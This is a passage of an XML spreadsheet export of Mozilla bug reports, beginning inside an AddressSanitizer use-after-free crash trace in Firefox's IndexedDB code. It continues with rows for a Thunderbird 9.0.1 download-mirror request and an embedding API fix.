    #11 0x7ff09d30cf38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #12 0x7ff09e0d3bff in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:368:5
    #13 0x7ff09e039070 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #14 0x7ff09e039070 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #15 0x7ff09e039070 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #16 0x7ff09d30991f in nsThread::ThreadFunc(void*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:500:11
    #17 0x7ff0b6ad8c93 in _pt_root /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #18 0x7ff0ba3d66c9 in start_thread (/lib64/libpthread.so.0+0x76c9)
Thread T38 (IPDL Background) created by T0 here:
    #0 0x4a3b76 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:245:3
    #1 0x7ff0b6ad5a39 in _PR_CreateThread /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7ff0b6ad564e in PR_CreateThread /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7ff09d30b657 in nsThread::Init(nsACString const&amp;) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:680:8
    #4 0x7ff09d314f3b in nsThreadManager::NewNamedThread(nsACString const&amp;, unsigned int, nsIThread**) /home/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:268:22
    #5 0x7ff09d316f03 in NS_NewNamedThread(nsACString const&amp;, nsIThread**, nsIRunnable*, unsigned int) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:105:45
    #6 0x7ff09e0a1529 in NS_NewNamedThread&lt;16&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7ff09e0a1529 in (anonymous namespace)::ParentImpl::CreateBackgroundThread() /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1125
    #8 0x7ff09e0a7903 in CreateActorForSameProcess /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1058:30
    #9 0x7ff09e0a7903 in (anonymous namespace)::ChildImpl::OpenProtocolOnMainThread(nsIEventTarget*) /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1992
    #10 0x7ff09e08d99f in (anonymous namespace)::ChildImpl::GetOrCreateForCurrentThread(nsIIPCBackgroundChildCreateCallback*) /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1615:9
    #11 0x7ff0a2d0615c in mozilla::dom::workers::ServiceWorkerManager::Init(mozilla::dom::ServiceWorkerRegistrar*) /home/worker/workspace/build/src/dom/workers/ServiceWorkerManager.cpp:283:8
    #12 0x7ff0a2d02d48 in mozilla::dom::workers::ServiceWorkerManager::GetInstance() /home/worker/workspace/build/src/dom/workers/ServiceWorkerManager.cpp:1682:16
    #13 0x7ff09fc0f65b in nsDocument::SetScriptGlobalObject(nsIScriptGlobalObject*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4742:40
    #14 0x7ff0a3b551ee in nsDocumentViewer::Close(nsISHEntry*) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1531:18
    #15 0x7ff0a5eb3210 in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9434:20
    #16 0x7ff0a5eb1e86 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7284:17
    #17 0x7ff0a5e482e1 in nsDocShell::CreateContentViewer(nsACString const&amp;, nsIRequest*, nsIStreamListener**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9263:3
    #18 0x7ff0a5e4548b in nsDSURIContentListener::DoContent(nsACString const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /home/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:128:21
    #19 0x7ff09ec1f706 in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:756:28
    #20 0x7ff09ec1c8dc in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:434:30
    #21 0x7ff09ec1b0f3 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:296:8
    #22 0x7ff09ea7a27f in nsJARChannel::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/modules/libjar/nsJARChannel.cpp:1023:30
    #23 0x7ff09d4bbfa0 in nsInputStreamPump::OnStateStart() /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:527:25
    #24 0x7ff09d4bb644 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:429:25
    #25 0x7ff09d2b0ebd in nsInputStreamReadyEvent::Run() /home/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:96:20
    #26 0x7ff09d3104f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #27 0x7ff09d30cf38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #28 0x7ff09e0d26d1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #29 0x7ff09e039070 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #30 0x7ff09e039070 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #31 0x7ff09e039070 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #32 0x7ff0a33665ef in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #33 0x7ff0a67c8881 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30
    #34 0x7ff0a698db7e in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4538:22
    #35 0x7ff0a698f500 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4718:8
    #36 0x7ff0a69907cc in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4811:21
    #37 0x4eb3c3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
    #38 0x4eb3c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
    #39 0x7ff0b9375400 in __libc_start_main (/lib64/libc.so.6+0x20400)
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21164:10 in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::FinishSendResults()
Shadow bytes around the buggy address:
  0x0c28800c5160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28800c5170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28800c5180: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c28800c5190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800c51a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c28800c51b0: fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd
  0x0c28800c51c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28800c51d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28800c51e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28800c51f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28800c520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8636==ABORTING
Second time is reproduced:
=================================================================
==9220==ERROR: AddressSanitizer: heap-use-after-free on address 0x614003578bc8 at pc 0x7f74f8432861 bp 0x7f74d1f849d0 sp 0x7f74d1f849c8
WRITE of size 4 at 0x614003578bc8 thread T38 (IPDL Background)
    #0 0x7f74f8432860 in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::FinishSendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21164:10
    #1 0x7f74f84352ea in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::SendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23283:3
    #2 0x7f74f83932af in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::Run() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21556:7
    #3 0x7f74f843305f in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::NoteDatabaseClosed(mozilla::dom::indexedDB::(anonymous namespace)::Database*) /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23247:5
    #4 0x7f74f83b8b0f in CloseInternal /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14495:30
    #5 0x7f74f83b8b0f in mozilla::dom::indexedDB::(anonymous namespace)::Database::RecvClose() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14948
    #6 0x7f74f3d20f24 in mozilla::dom::indexedDB::PBackgroundIDBDatabaseParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundIDBDatabaseParent.cpp:431:20
    #7 0x7f74f3e90f57 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:904:28
    #8 0x7f74f39cb124 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1903:25
    #9 0x7f74f39c7957 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1838:17
    #10 0x7f74f39c9d94 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1711:5
    #11 0x7f74f39ca396 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1744:15
    #12 0x7f74f2c104f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #13 0x7f74f2c0cf38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #14 0x7f74f39d3bff in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:368:5
    #15 0x7f74f3939070 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #16 0x7f74f3939070 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #17 0x7f74f3939070 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #18 0x7f74f2c0991f in nsThread::ThreadFunc(void*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:500:11
    #19 0x7f750c3d8c93 in _pt_root /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #20 0x7f750fcfa6c9 in start_thread (/lib64/libpthread.so.0+0x76c9)
    #21 0x7f750ed80f7e in __GI___clone (/lib64/libc.so.6+0x107f7e)
0x614003578bc8 is located 392 bytes inside of 448-byte region [0x614003578a40,0x614003578c00)
freed by thread T38 (IPDL Background) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f74f2c1a093 in mozilla::Runnable::Release() /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:40:1
    #2 0x7f74f84326c2 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40:11
    #3 0x7f74f84326c2 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:395
    #4 0x7f74f84326c2 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:78
    #5 0x7f74f84326c2 in Destruct /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:560
    #6 0x7f74f84326c2 in DestructRange /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2007
    #7 0x7f74f84326c2 in RemoveElementsAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2055
    #8 0x7f74f84326c2 in RemoveElementAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1730
    #9 0x7f74f84326c2 in RemoveElement&lt;mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp *, nsDefaultComparator&lt;RefPtr&lt;mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp&gt;, mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp *&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1756
    #10 0x7f74f84326c2 in RemoveElement&lt;mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1765
    #11 0x7f74f84326c2 in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::FinishSendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21158
    #12 0x7f74f84352ea in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::SendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23283:3
    #13 0x7f74f83932af in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::Run() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21556:7
    #14 0x7f74f843305f in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::NoteDatabaseClosed(mozilla::dom::indexedDB::(anonymous namespace)::Database*) /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23247:5
    #15 0x7f74f83b8b0f in CloseInternal /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14495:30
    #16 0x7f74f83b8b0f in mozilla::dom::indexedDB::(anonymous namespace)::Database::RecvClose() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14948
    #17 0x7f74f3d20f24 in mozilla::dom::indexedDB::PBackgroundIDBDatabaseParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundIDBDatabaseParent.cpp:431:20
    #18 0x7f74f3e90f57 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:904:28
    #19 0x7f74f39cb124 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1903:25
    #20 0x7f74f39c7957 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1838:17
    #21 0x7f74f39c9d94 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1711:5
    #22 0x7f74f39ca396 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1744:15
    #23 0x7f74f2c104f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #24 0x7f74f2c0cf38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #25 0x7f74f39d3bff in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:368:5
    #26 0x7f74f3939070 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #27 0x7f74f3939070 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #28 0x7f74f3939070 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #29 0x7f74f2c0991f in nsThread::ThreadFunc(void*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:500:11
    #30 0x7f750c3d8c93 in _pt_root /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #31 0x7f750fcfa6c9 in start_thread (/lib64/libpthread.so.0+0x76c9)
previously allocated by thread T38 (IPDL Background) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f74f83917dc in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f74f83917dc in mozilla::dom::indexedDB::(anonymous namespace)::Factory::AllocPBackgroundIDBFactoryRequestParent(mozilla::dom::indexedDB::FactoryRequestParams const&amp;) /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14056
    #4 0x7f74f3e40623 in mozilla::dom::indexedDB::PBackgroundIDBFactoryParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundIDBFactoryParent.cpp:234:21
    #5 0x7f74f3e90f57 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:904:28
    #6 0x7f74f39cb124 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1903:25
    #7 0x7f74f39c7957 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1838:17
    #8 0x7f74f39c9d94 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1711:5
    #9 0x7f74f39ca396 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1744:15
    #10 0x7f74f2c104f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #11 0x7f74f2c0cf38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #12 0x7f74f39d3bff in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:368:5
    #13 0x7f74f3939070 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #14 0x7f74f3939070 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #15 0x7f74f3939070 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #16 0x7f74f2c0991f in nsThread::ThreadFunc(void*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:500:11
    #17 0x7f750c3d8c93 in _pt_root /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #18 0x7f750fcfa6c9 in start_thread (/lib64/libpthread.so.0+0x76c9)
Thread T38 (IPDL Background) created by T0 here:
    #0 0x4a3b76 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:245:3
    #1 0x7f750c3d5a39 in _PR_CreateThread /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7f750c3d564e in PR_CreateThread /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7f74f2c0b657 in nsThread::Init(nsACString const&amp;) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:680:8
    #4 0x7f74f2c14f3b in nsThreadManager::NewNamedThread(nsACString const&amp;, unsigned int, nsIThread**) /home/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:268:22
    #5 0x7f74f2c16f03 in NS_NewNamedThread(nsACString const&amp;, nsIThread**, nsIRunnable*, unsigned int) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:105:45
    #6 0x7f74f39a1529 in NS_NewNamedThread&lt;16&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7f74f39a1529 in (anonymous namespace)::ParentImpl::CreateBackgroundThread() /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1125
    #8 0x7f74f39a7903 in CreateActorForSameProcess /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1058:30
    #9 0x7f74f39a7903 in (anonymous namespace)::ChildImpl::OpenProtocolOnMainThread(nsIEventTarget*) /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1992
    #10 0x7f74f398d99f in (anonymous namespace)::ChildImpl::GetOrCreateForCurrentThread(nsIIPCBackgroundChildCreateCallback*) /home/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:1615:9
    #11 0x7f74f860615c in mozilla::dom::workers::ServiceWorkerManager::Init(mozilla::dom::ServiceWorkerRegistrar*) /home/worker/workspace/build/src/dom/workers/ServiceWorkerManager.cpp:283:8
    #12 0x7f74f8602d48 in mozilla::dom::workers::ServiceWorkerManager::GetInstance() /home/worker/workspace/build/src/dom/workers/ServiceWorkerManager.cpp:1682:16
    #13 0x7f74f550f65b in nsDocument::SetScriptGlobalObject(nsIScriptGlobalObject*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4742:40
    #14 0x7f74f94551ee in nsDocumentViewer::Close(nsISHEntry*) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1531:18
    #15 0x7f74fb7b3210 in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9434:20
    #16 0x7f74fb7b1e86 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7284:17
    #17 0x7f74fb7482e1 in nsDocShell::CreateContentViewer(nsACString const&amp;, nsIRequest*</t>
        </is>
      </c>
      <c r="X4954" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4955">
      <c r="A4955" t="n">
        <v>713096</v>
      </c>
      <c r="B4955" t="inlineStr">
        <is>
          <t>2011-12-22 13:51:57 -0800</t>
        </is>
      </c>
      <c r="C4955" t="inlineStr">
        <is>
          <t>Add Thunderbird 9.0.1 to bouncer</t>
        </is>
      </c>
      <c r="D4955" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4955" t="n">
        <v>1</v>
      </c>
      <c r="F4955" t="n">
        <v>1</v>
      </c>
      <c r="G4955" t="n">
        <v>5</v>
      </c>
      <c r="H4955" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4955" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4955" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4955" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4955" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4955" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4955" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4955" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4955" t="inlineStr"/>
      <c r="Q4955" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4955" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4955" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4955" t="n">
        <v>1</v>
      </c>
      <c r="U4955" t="n">
        <v>0</v>
      </c>
      <c r="V4955" t="n">
        <v>4</v>
      </c>
      <c r="W4955" t="inlineStr">
        <is>
          <t>The Thunderbird team is going to release Thunderbird 9.0.1 on 23rd December 2011, and we'd like to have the main builds added to bouncer for downloads.
The relevant URLs to add are (bouncer and FTP):
Thunderbird-9.0.1                     osx   /thunderbird/releases/9.0.1/mac/:lang/Thunderbird%209.0.1.dmg
Thunderbird-9.0.1                     linux /thunderbird/releases/9.0.1/linux-i686/:lang/thunderbird-9.0.1.tar.bz2
Thunderbird-9.0.1                     linux64 /thunderbird/releases/9.0.1/linux-x86_64/:lang/thunderbird-9.0.1.tar.bz2
Thunderbird-9.0.1                     win   /thunderbird/releases/9.0.1/win32/:lang/Thunderbird%20Setup%209.0.1.exe
Thunderbird-9.0.1-Complete            osx   /thunderbird/releases/9.0.1/update/mac/:lang/thunderbird-9.0.1.complete.mar
Thunderbird-9.0.1-Complete            linux /thunderbird/releases/9.0.1/update/linux-i686/:lang/thunderbird-9.0.1.complete.mar
Thunderbird-9.0.1-Complete            linux64 /thunderbird/releases/9.0.1/update/linux-x86_64/:lang/thunderbird-9.0.1.complete.mar
Thunderbird-9.0.1-Complete            win   /thunderbird/releases/9.0.1/update/win32/:lang/thunderbird-9.0.1.complete.mar
Thunderbird-9.0.1-Partial-9.0  osx   /thunderbird/releases/9.0.1/update/mac/:lang/thunderbird-9.0-9.0.1.partial.mar
Thunderbird-9.0.1-Partial-9.0  linux /thunderbird/releases/9.0.1/update/linux-i686/:lang/thunderbird-9.0-9.0.1.partial.mar
Thunderbird-9.0.1-Partial-9.0  linux64 /thunderbird/releases/9.0.1/update/linux-x86_64/:lang/thunderbird-9.0-9.0.1.partial.mar
Thunderbird-9.0.1-Partial-9.0  win   /thunderbird/releases/9.0.1/update/win32/:lang/thunderbird-9.0-9.0.1.partial.mar</t>
        </is>
      </c>
      <c r="X4955" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4956">
      <c r="A4956" t="n">
        <v>68187</v>
      </c>
      <c r="B4956" t="inlineStr">
        <is>
          <t>2001-02-08 11:30:36 -0800</t>
        </is>
      </c>
      <c r="C4956" t="inlineStr">
        <is>
          <t>nsIWebBrowser::AddBrowserListener() needs to take an nsIWeakReference</t>
        </is>
      </c>
      <c r="D4956" t="inlineStr">
        <is>
          <t>2019-03-26 10:47:02 -0700</t>
        </is>
      </c>
      <c r="E4956" t="n">
        <v>1</v>
      </c>
      <c r="F4956" t="n">
        <v>1</v>
      </c>
      <c r="G4956" t="n">
        <v>6</v>
      </c>
      <c r="H4956" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4956" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4956" t="inlineStr">
        <is>
          <t>Embedding: APIs</t>
        </is>
      </c>
      <c r="K4956" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4956" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4956" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N4956" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4956" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4956" t="inlineStr"/>
      <c r="Q4956" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4956" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4956" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T4956" t="n">
        <v>1</v>
      </c>
      <c r="U4956" t="n">
        <v>0</v>
      </c>
      <c r="V4956" t="n">
        <v>15</v>
      </c>
      <c r="W4956" t="inlineStr">
        <is>
          <t>right now we have the impl requirement that the listener impl nsIWeakReference. 
this should be reflected by replacing nsISupports w/ nsIWeakReference in the 
method signature.</t>
        </is>
      </c>
      <c r="X4956" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4957">
      <c r="A4957" t="n">
        <v>164204</v>
      </c>
      <c r="B4957" t="inlineStr">
        <is>
          <t>2002-08-23 00:19:50 -0700</t>
        </is>
      </c>
      <c r="C4957" t="inlineStr">
        <is>
          <t>Need Level 3 IME Support on winxp for MS PinYin v3 ime</t>
        </is>
      </c>
      <c r="D4957" t="inlineStr">
        <is>
          <t>2010-06-18 19:01:30 -0700</t>
        </is>
      </c>
